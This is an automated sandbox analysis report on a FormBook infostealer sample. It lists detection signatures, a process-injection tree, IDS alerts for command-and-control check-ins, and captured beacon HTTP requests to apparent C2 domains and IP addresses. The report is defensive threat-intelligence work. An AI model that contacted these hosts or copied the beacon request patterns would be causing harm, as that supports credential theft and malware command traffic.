Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ofZiNLLKZU.exe

Overview

General Information

Sample name:ofZiNLLKZU.exe
renamed because original name is a hash value
Original sample name:eeeaa1d7c634e0cc3f1550e756208a118f28be191b374ba6a2e3690f89949751.exe
Analysis ID:1587873
MD5:68056372ed7e2ab369235bf4c2e9cfb5
SHA1:d75a067e94a4da806d391ea85892cc9608e6f455
SHA256:eeeaa1d7c634e0cc3f1550e756208a118f28be191b374ba6a2e3690f89949751
Tags:exeFormbookuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • ofZiNLLKZU.exe (PID: 7760 cmdline: "C:\Users\user\Desktop\ofZiNLLKZU.exe" MD5: 68056372ED7E2AB369235BF4C2E9CFB5)
    • svchost.exe (PID: 7840 cmdline: "C:\Users\user\Desktop\ofZiNLLKZU.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • kwRriiLHUBrBci.exe (PID: 1460 cmdline: "C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • TCPSVCS.EXE (PID: 8056 cmdline: "C:\Windows\SysWOW64\TCPSVCS.EXE" MD5: 73905DB831B4F37F0673D2DD5BBF7779)
          • kwRriiLHUBrBci.exe (PID: 5180 cmdline: "C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7404 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.3900696034.0000000002600000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.3900973185.0000000002790000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000002.00000002.1724553623.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000002.00000002.1724963912.0000000003790000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000006.00000002.3905770259.0000000004F80000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Uncommon Svchost Parent Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\ofZiNLLKZU.exe", CommandLine: "C:\Users\user\Desktop\ofZiNLLKZU.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\ofZiNLLKZU.exe", ParentImage: C:\Users\user\Desktop\ofZiNLLKZU.exe, ParentProcessId: 7760, ParentProcessName: ofZiNLLKZU.exe, ProcessCommandLine: "C:\Users\user\Desktop\ofZiNLLKZU.exe", ProcessId: 7840, ProcessName: svchost.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\ofZiNLLKZU.exe", CommandLine: "C:\Users\user\Desktop\ofZiNLLKZU.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\ofZiNLLKZU.exe", ParentImage: C:\Users\user\Desktop\ofZiNLLKZU.exe, ParentProcessId: 7760, ParentProcessName: ofZiNLLKZU.exe, ProcessCommandLine: "C:\Users\user\Desktop\ofZiNLLKZU.exe", ProcessId: 7840, ProcessName: svchost.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-10T18:54:13.696505+010028554641A Network Trojan was detected192.168.2.849711104.21.28.6580TCP
                2025-01-10T18:54:16.410603+010028554641A Network Trojan was detected192.168.2.849712104.21.28.6580TCP
                2025-01-10T18:54:18.902834+010028554641A Network Trojan was detected192.168.2.849713104.21.28.6580TCP
                2025-01-10T18:54:28.889425+010028554641A Network Trojan was detected192.168.2.849715172.67.138.13880TCP
                2025-01-10T18:54:31.436376+010028554641A Network Trojan was detected192.168.2.849718172.67.138.13880TCP
                2025-01-10T18:54:33.983258+010028554641A Network Trojan was detected192.168.2.849719172.67.138.13880TCP
                2025-01-10T18:55:20.841779+010028554641A Network Trojan was detected192.168.2.84972169.57.163.6480TCP
                2025-01-10T18:55:23.389513+010028554641A Network Trojan was detected192.168.2.84972269.57.163.6480TCP
                2025-01-10T18:55:25.919332+010028554641A Network Trojan was detected192.168.2.84972369.57.163.6480TCP
                2025-01-10T18:55:35.244239+010028554641A Network Trojan was detected192.168.2.849725101.32.205.6180TCP
                2025-01-10T18:55:37.684101+010028554641A Network Trojan was detected192.168.2.849726101.32.205.6180TCP
                2025-01-10T18:55:40.303895+010028554641A Network Trojan was detected192.168.2.849727101.32.205.6180TCP
                2025-01-10T18:55:50.108422+010028554641A Network Trojan was detected192.168.2.849729103.159.36.6680TCP
                2025-01-10T18:55:52.655340+010028554641A Network Trojan was detected192.168.2.849730103.159.36.6680TCP
                2025-01-10T18:55:55.202255+010028554641A Network Trojan was detected192.168.2.849731103.159.36.6680TCP
                2025-01-10T18:56:03.712870+010028554641A Network Trojan was detected192.168.2.849733103.168.172.3780TCP
                2025-01-10T18:56:07.234547+010028554641A Network Trojan was detected192.168.2.849734103.168.172.3780TCP
                2025-01-10T18:56:08.851280+010028554641A Network Trojan was detected192.168.2.849735103.168.172.3780TCP
                2025-01-10T18:56:17.936704+010028554641A Network Trojan was detected192.168.2.849737188.114.96.380TCP
                2025-01-10T18:56:20.484198+010028554641A Network Trojan was detected192.168.2.849738188.114.96.380TCP
                2025-01-10T18:56:23.030524+010028554641A Network Trojan was detected192.168.2.849739188.114.96.380TCP
                2025-01-10T18:57:09.179374+010028554641A Network Trojan was detected192.168.2.84974184.32.84.3280TCP
                2025-01-10T18:57:11.524565+010028554641A Network Trojan was detected192.168.2.84974284.32.84.3280TCP
                2025-01-10T18:57:14.240369+010028554641A Network Trojan was detected192.168.2.84974384.32.84.3280TCP
                2025-01-10T18:57:23.090653+010028554641A Network Trojan was detected192.168.2.849745208.91.197.2780TCP
                2025-01-10T18:57:25.707410+010028554641A Network Trojan was detected192.168.2.849746208.91.197.2780TCP
                2025-01-10T18:57:28.193400+010028554641A Network Trojan was detected192.168.2.849747208.91.197.2780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: ofZiNLLKZU.exeReversingLabs: Detection: 71%
                Source: ofZiNLLKZU.exeVirustotal: Detection: 63%Perma Link
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.3900696034.0000000002600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3900973185.0000000002790000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1724553623.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1724963912.0000000003790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3905770259.0000000004F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1725326786.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3900101760.0000000000130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3902676049.0000000002C90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: ofZiNLLKZU.exeJoe Sandbox ML: detected
                Source: ofZiNLLKZU.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: kwRriiLHUBrBci.exe, 00000004.00000000.1649615978.0000000000BAE000.00000002.00000001.01000000.00000005.sdmp, kwRriiLHUBrBci.exe, 00000006.00000002.3901520973.0000000000BAE000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: tcpsvcs.pdb source: svchost.exe, 00000002.00000002.1724812110.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1724832326.0000000003419000.00000004.00000020.00020000.00000000.sdmp, kwRriiLHUBrBci.exe, 00000004.00000002.3901858595.00000000011F8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: ofZiNLLKZU.exe, 00000000.00000003.1469038051.00000000043D0000.00000004.00001000.00020000.00000000.sdmp, ofZiNLLKZU.exe, 00000000.00000003.1469321830.0000000004230000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1725013756.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1631822493.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1725013756.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1634122122.0000000003800000.00000004.00000020.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000003.1733003982.0000000002A31000.00000004.00000020.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000003.1735628342.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.3903783191.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.3903783191.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: ofZiNLLKZU.exe, 00000000.00000003.1469038051.00000000043D0000.00000004.00001000.00020000.00000000.sdmp, ofZiNLLKZU.exe, 00000000.00000003.1469321830.0000000004230000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1725013756.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1631822493.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1725013756.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1634122122.0000000003800000.00000004.00000020.00020000.00000000.sdmp, TCPSVCS.EXE, TCPSVCS.EXE, 00000005.00000003.1733003982.0000000002A31000.00000004.00000020.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000003.1735628342.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.3903783191.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.3903783191.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: tcpsvcs.pdbGCTL source: svchost.exe, 00000002.00000002.1724812110.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1724832326.0000000003419000.00000004.00000020.00020000.00000000.sdmp, kwRriiLHUBrBci.exe, 00000004.00000002.3901858595.00000000011F8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: TCPSVCS.EXE, 00000005.00000002.3904938820.00000000033BC000.00000004.10000000.00040000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.3901472005.000000000293D000.00000004.00000020.00020000.00000000.sdmp, kwRriiLHUBrBci.exe, 00000006.00000002.3903610793.0000000002B4C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2061663725.00000000061EC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: TCPSVCS.EXE, 00000005.00000002.3904938820.00000000033BC000.00000004.10000000.00040000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.3901472005.000000000293D000.00000004.00000020.00020000.00000000.sdmp, kwRriiLHUBrBci.exe, 00000006.00000002.3903610793.0000000002B4C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2061663725.00000000061EC000.00000004.80000000.00040000.00000000.sdmp
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_0063DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0063DBBE
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_0060C2A2 FindFirstFileExW,0_2_0060C2A2
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_006468EE FindFirstFileW,FindClose,0_2_006468EE
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_0064698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_0064698F
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_0063D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0063D076
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_0063D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0063D3A9
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_00649642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00649642
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_0064979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0064979D
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_00649B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00649B2B
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_00645C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00645C97
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_0014C4E0 FindFirstFileW,FindNextFileW,FindClose,5_2_0014C4E0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 4x nop then xor eax, eax5_2_00139E40
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 4x nop then pop edi5_2_0013E0F4
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 4x nop then mov ebx, 00000004h5_2_02A30528

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49713 -> 104.21.28.65:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49711 -> 104.21.28.65:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49712 -> 104.21.28.65:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49723 -> 69.57.163.64:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49727 -> 101.32.205.61:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49718 -> 172.67.138.138:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49719 -> 172.67.138.138:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49725 -> 101.32.205.61:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49721 -> 69.57.163.64:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49730 -> 103.159.36.66:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49739 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49737 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49731 -> 103.159.36.66:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49729 -> 103.159.36.66:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49745 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49735 -> 103.168.172.37:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49746 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49734 -> 103.168.172.37:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49743 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49733 -> 103.168.172.37:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49726 -> 101.32.205.61:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49738 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49741 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49742 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49715 -> 172.67.138.138:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49722 -> 69.57.163.64:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49747 -> 208.91.197.27:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.binjai77rtp11f.xyz
                Source: Joe Sandbox ViewIP Address: 103.168.172.37 103.168.172.37
                Source: Joe Sandbox ViewASN Name: FORTRESSITXUS FORTRESSITXUS
                Source: Joe Sandbox ViewASN Name: AARNET-AS-APAustralianAcademicandResearchNetworkAARNe AARNET-AS-APAustralianAcademicandResearchNetworkAARNe
                Source: Joe Sandbox ViewASN Name: TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\ofZiNLLKZU.exeCode function: 0_2_0064CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_0064CE44
                Source: global trafficHTTP traffic detected: GET /s1oh/?0FJ=D00hHLh&irCxl6=BXpE0/AUcXIdlK4Vr8yV3zIibIy5i6h6aTfhPuGOJWtXj1ch45iPBtMttb76vGkDjkWsjXgzDhYROXwUhHpTT37wm3kse0ebZeD1BOaz6lVPyMDO71Du749G1F/4BLBNXw== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeHost: www.3nhc3a.topUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /9fei/?irCxl6=9hwMTPf/o+GewSNr0PZcNyjUpNs4oV11JaaOJ/4hdktbA5fMK3ajxj9W7lKuvaKLl9eyr3kbg9/8Pn7CG+MHPzFPLCnPEL+bBN+DL4U4BkbYG2HsYKvT3cQqMuOVV8lKBQ==&0FJ=D00hHLh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeHost: www.binjai77rtp11f.xyzUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /wmxx/?0FJ=D00hHLh&irCxl6=zdZDiDz9NcDAxdPT/uWXYjOZ7xdg3NSLew0AnBcQq7wq0cWPcv1qrwj1W7YWM/gj4sM+0wouZwjbIFjwenXJ+O4VSQPSXkwvnSmJEYaf1BK13FkupONapGDJTjw9KvkhIA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeHost: www.vietnamtour.proUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /zbqa/?irCxl6=VL/7+LncUKg93smxMKx16PJyQUb9eyDUwLSrEzeHp8x1IkOi8uzSCeY3r5BUse/S3M+vRdZQg/I11o5hNVVA7SQLtfVsXWgzAL3L+IJqGxdPdltrLo2WzEd+oOLSgjkcqA==&0FJ=D00hHLh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeHost: www.showyourstyle.topUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /gtil/?0FJ=D00hHLh&irCxl6=yyp7zDkplnhFTYOX3ExWxIUq0IjfKVeUoM/g1Z3Itn+WrDb/JBNc3lr1wwtaU5LmbkDFl3V0HSUPXljFvyI/43E9pOq5Y7bgQWtruYXflXEVT6YhdPLVpdYAFb3D0RMErQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeHost: www.rwse6wjx.sbsUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /nfd2/?irCxl6=Nz4SRZ+ZcsWDvLDLaExFXoqxLF9RdDOa1L87IpfF7DS4rl0CQqW5nKUTlgEwSOCJB6dlUsv6D3EsaGzmyQ5ZB5AOjp44EvTwqJF0vghgjnDPOb2iH8sdTWQtstyoz2bs+w==&0FJ=D00hHLh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeHost: www.rokeyfashion.storeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /up4e/?irCxl6=VXc1jWSgqs8x7qdgafwEWVcLTvt60MncsX8sB3hxkBZ1r/WG9R0muDMsDsUoNKEWb3GhLvkp8KOPLwQ4Bi3owHJAbIJD7pBSH8qbt8k3G95dMvpBnol4dqnd3B3JqqcnGw==&0FJ=D00hHLh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeHost: www.lucelight.infoUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
